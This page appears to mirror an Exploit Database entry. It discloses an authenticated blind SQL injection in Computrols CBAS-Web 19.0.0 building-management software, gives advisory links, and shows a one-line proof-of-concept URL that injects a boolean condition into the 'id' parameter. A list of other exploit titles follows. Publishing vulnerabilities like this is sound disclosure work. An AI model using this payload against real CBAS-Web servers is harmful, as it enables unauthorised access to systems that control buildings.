CBAS-Web 19.0.0 – ‘id’ Boolean-based Blind SQL Injection

Exploit Database
16 阅读

作者： LiquidWorm

日期： 2019-11-12
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47631/

# Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : N/A
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

# Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
# PoC (id param):

http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510

last Exploits
CBAS-Web 19.0.0 – ‘id’ Boolean-based Blind SQL Injection的更多信息

Cybrotech CyBroHttpServer 1.0.3 – Directory Traversal：
Zenoss 3.2.1 – Multiple Vulnerabilities：
FLIR Thermal Traffic Cameras 1.01-0bb5b27 – RTSP Stream Disclosure：
Openfire 3.10.2 – Cross-Site Request Forgery：
GeekHelps ADMP 1.01 – Multiple Vulnerabilities：
Joomla! Component Joomanager – SQL Injection：
Powie’s PSCRIPT Gästebuch 2.09 – SQL Injection：
Stackposts Social Marketing Tool v1.0 – SQL Injection：